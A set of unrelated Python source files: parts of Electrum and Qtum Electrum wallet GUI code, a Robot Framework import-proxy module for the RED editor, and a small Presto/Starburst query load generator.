self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
SuiteVisitorImportProxy.py
|
#
# Copyright 2017 Nokia Solutions and Networks
# Licensed under the Apache License, Version 2.0,
# see license.txt file for details.
#
import threading
import sys
import json
import types
import inspect
import re
from robot.api import SuiteVisitor
from robot.running import TestLibrary
from robot.running.testlibraries import _BaseTestLibrary
from robot.running.handlers import _DynamicHandler, _JavaHandler
from robot.output import LOGGER, Message
class SuiteVisitorImportProxy(SuiteVisitor):
LIB_IMPORT_TIMEOUT = 60
def __init__(self, robot_version, handle_keywords=False, support_gevent=False):
import robot.running.namespace
robot.running.namespace.IMPORTER = RedImporter(robot.running.namespace.IMPORTER, self.LIB_IMPORT_TIMEOUT,
robot_version, handle_keywords, support_gevent)
def visit_suite(self, suite):
suite.tests.clear()
suite.keywords.clear()
suite.suites.visit(self)
def visit_test(self, test):
# test visiting skipped
pass
def visit_keyword(self, kw):
# keyword visiting skipped
pass
def visit_message(self, msg):
# message visiting skipped
pass
class RedImporter(object):
def __init__(self, importer, lib_import_timeout, robot_version, handle_keywords=False, support_gevent=False):
self.importer = importer
self.lib_import_timeout = lib_import_timeout
self.robot_version = robot_version
self.handle_keywords = handle_keywords
self.support_gevent = support_gevent
self.func = None
self.lock = threading.Lock()
self.cached_lib_items = list()
self.cached_kw_items = set()
def __getattr__(self, name):
self.lock.acquire()
try:
if hasattr(self.importer, name):
func = getattr(self.importer, name)
return lambda *args, **kwargs: self._wrap(func, args, kwargs)
raise AttributeError(name)
finally:
self.lock.release()
def _wrap(self, func, args, kwargs):
if isinstance(func, types.MethodType):
if func.__name__ == 'import_library':
return self._handle_lib_import(func, args, kwargs)
else:
return func(*args, **kwargs)
else:
return func(self.importer, *args, **kwargs)
def _handle_lib_import(self, func, args, kwargs):
libs = []
errors = []
lib_cached = self._get_lib_from_cache(args[0], args[1])
if lib_cached:
libs.append(lib_cached.lib)
errors = lib_cached.errors
else:
try:
# this is required to not get blocked thread in code using gevent; if it's not supported
# the sleep function is just void
if self.support_gevent:
from gevent import monkey, sleep
monkey.patch_all()
else:
sleep = lambda : None
def to_call():
try:
libs.append(func(*args, **kwargs))
sleep()
except:
errors.append(sys.exc_info())
t = threading.Thread(target=to_call)
t.setDaemon(True)
t.start()
t.join(timeout=self.lib_import_timeout)
except:
errors.append(sys.exc_info())
if len(libs) > 0:
library = libs[0]
else:
try:
library = self._create_test_library(args[0], args[1], args[2])
except:
try:
library = self._create_base_test_library(args[0], args[1], args[2])
except:
try:
library = self._create_base_test_library(args[0], [], args[3])
except:
errors.append(sys.exc_info())
for e in errors:
msg = json.dumps({'import_error': {'name': args[0], 'error': str(e)}})
LOGGER.message(Message(message=msg, level='NONE'))
try:
if lib_cached is None:
self.cached_lib_items.append(LibItem(args[0], args[1], library, errors))
if self.handle_keywords:
self._handle_keywords(library)
return library
except:
return None
def _get_lib_from_cache(self, name, args):
for cached_lib in self.cached_lib_items:
if cached_lib.name == name:
if len(cached_lib.args) == len(args):
for cached_arg, arg in zip(cached_lib.args, args):
if cached_arg != arg:
return None
return cached_lib
return None
def _create_test_library(self, name, args, variables):
return TestLibrary(name=name, args=args, variables=variables, create_handlers=False)
def _create_base_test_library(self, name, args, variables):
if self.robot_version < (3, 2):
return _BaseTestLibrary(libcode=None, name=name, args=args, source=None, variables=variables)
else:
return _BaseTestLibrary(libcode=None, name=name, args=args, source=None, logger=None, variables=variables)
def _handle_keywords(self, library):
if library is not None and hasattr(library, 'handlers'):
for keyword in library.handlers:
if keyword not in self.cached_kw_items and not isinstance(keyword, _JavaHandler):
try:
keyword_source = PythonKeywordSource(keyword)
msg = json.dumps({'keyword_source': dict(keyword_source.__dict__)})
LOGGER.message(Message(message=msg, level='NONE'))
except:
pass # TODO: add logging
finally:
self.cached_kw_items.add(keyword)
class LibItem(object):
def __init__(self, name, args, lib=None, errors=list()):
self.name = name
self.args = args
self.lib = lib
self.errors = errors
class PythonKeywordSource(object):
def __init__(self, keyword):
self.name = keyword.name
self.libraryName = keyword.library.name
self.filePath, self.line, self.offset, self.length = PythonKeywordSource._find_source(keyword)
@staticmethod
def _find_source(keyword):
function = PythonKeywordSource._find_function(keyword)
path = inspect.getfile(function)
source = inspect.getsourcelines(function)
for lineIdx, line in enumerate(source[0]):
m = re.search('(?<=def)(\s*)([^ \t\n\r\f\v(]+)', line)
if m is not None:
line = source[1] + lineIdx - 1
offset = m.start(2)
length = len(m.group(2))
return path, line, offset, length
return path, 0, 0, 0
@staticmethod
def _find_function(keyword):
if isinstance(keyword, _DynamicHandler):
function = keyword.library._libcode.__dict__[keyword._run_keyword_method_name]
elif keyword._method:
function = keyword._method
else:
function = keyword._get_handler(keyword.library.get_instance(), keyword._handler_name)
return PythonKeywordSource._try_to_find_decorated_function(function)
@staticmethod
def _try_to_find_decorated_function(function):
try:
if hasattr(function, '__wrapped__'):
# decorated functions support, https://pypi.org/project/decorator
wrapped = getattr(function, '__wrapped__')
return PythonKeywordSource._try_to_find_decorated_function(wrapped)
elif hasattr(function, '__functions'):
# overloaded functions support, see https://github.com/bintoro/overloading.py
overloaded = getattr(function, '__functions')[0][0]
return PythonKeywordSource._try_to_find_decorated_function(overloaded)
else:
return function
except:
return function
|
loadgen.py
|
#!python
import prestodb, time, threading
import time
# Change this array to include the queries you want to rotate through
queries = [ "select max(nationkey) from s3.s.nation",
"select min(partkey) from s3.s.part",
"select min(custkey) from s3.s.customer",
"select max(orderkey) from s3.s.orders"]
threadpoolsize = 200
newconnectionpause = 0.1
newquerypause = 0.0
reportingpause = 1.0
lock = threading.Lock()
class Counter:
def __init__(self):
self.count = 0
self.lock = threading.Lock()
def inc(self):
with lock:
self.count += 1
def dec(self):
with lock:
self.count -= 1
def getCount(self):
with lock:
return self.count
nq = Counter()
def runme():
conn = prestodb.dbapi.connect(
http_scheme = 'https',
auth = prestodb.auth.BasicAuthentication("starburst_service", "test"),
host = 'starburst.az.starburstdata.net',
port = 8443,
catalog = 's3',
schema = 's')
cur = conn.cursor()
q = 0
while True:
nq.inc()
cur.execute(queries[q & 3])
q += 1
cur.fetchall()
nq.dec()
time.sleep(newquerypause)
threads = []
last = time.time()
while True:
if len(threads) < threadpoolsize:
t = threading.Thread(target = runme)
t.start()
threads.append(t)
time.sleep(newconnectionpause)
if (now := time.time()) - last > reportingpause:
last = now
print("Threads: {a}; Active queries: {q}".format(a = len(threads), q =
nq.getCount()))
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
import os
import traceback
import shutil
import weakref
import csv
from decimal import Decimal
import base64
import binascii
import eth_abi
from PyQt5.QtCore import Qt
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from qtum_electrum import keystore
from qtum_electrum.qtum import COIN, is_address, TYPE_ADDRESS, TYPE_SCRIPT, TESTNET, is_hash160, eth_abi_encode
from qtum_electrum.plugins import run_hook
from qtum_electrum.i18n import _
from qtum_electrum.util import (bh2u, bfh, format_time, format_satoshis, PrintError, format_satoshis_plain,
NotEnoughFunds, UserCancelled, profiler, export_meta, import_meta, open_browser,
InvalidPassword)
from qtum_electrum import Transaction
from qtum_electrum import util, bitcoin, commands, coinchooser
from qtum_electrum import paymentrequest
from qtum_electrum.transaction import opcodes, contract_script
from qtum_electrum.wallet import Multisig_Wallet, AddTransactionException
from qtum_electrum.tokens import Token
try:
from qtum_electrum.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
from .token_dialog import TokenAddDialog, TokenInfoDialog, TokenSendDialog
from .smart_contract_dialog import ContractCreateDialog, ContractFuncDialog, ContractEditDialog
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
new_fx_token_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.smart_contracts = wallet.smart_contracts
self.tokens = wallet.tokens
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.tokens_tab = self.create_tokens_tab()
self.smart_contract_tab = self.create_smart_contract_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
tabs.addTab(self.tokens_tab, QIcon(":icons/tab_contacts.png"), _('Tokens'))
# tabs.addTab(self.contacts_tab, QIcon(":icons/tab_contacts.png"), _('Contacts'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contracts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.smart_contract_tab, QIcon(":icons/tab_console.png"), _('Smart Contract'),
'contract')
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.network.register_callback(self.on_token, ['on_token'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
self.new_fx_token_signal.connect(self.on_fx_token)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def on_token(self, b):
self.new_fx_token_signal.emit()
def on_fx_token(self):
self.token_balance_list.update()
self.token_hist_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 860, 460)
def watching_only_changed(self):
title = 'Electrum for Qtum <Beta> %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
# self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
if TESTNET:
title += ' - testnet'
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend qtums with it."),
_("Make sure you own the seed phrase or the private keys, before you request Qtums to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (BaseException,) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
address_menu = wallet_menu.addMenu(_("&Addresses"))
address_menu.addAction(_("&Filter"), lambda: self.address_list.show_toolbar(True))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction(_("&Filter"), lambda: self.history_list.show_toolbar(True))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
token_menu = wallet_menu.addMenu(_("Token"))
token_menu.addAction(_("Add Token"), lambda: self.token_add_dialog())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.console_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.smart_contract_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"),
lambda: open_browser("https://github.com/qtumproject/qtum-electrum/"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: open_browser("http://docs.electrum.org/")).setShortcut(
QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
# help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('qtum:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Qtum Electrum",
_("Version") +" %s" % (self.wallet.electrum_version) + "\n\n" +
_(
"This software is based on Electrum to support Qtum. Qtum Electrum's focus is speed, with low resource usage and simplifying Qtum. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/qtumproject/qtum-electrum/issues\">https://github.com/qtumproject/qtum-electrum/issues</a><br></br>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Qtum Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more then three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Qtum Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mQTUM'
if self.decimal_point == 8:
return 'QTUM'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(BLACK_FG)
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if not rate or rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
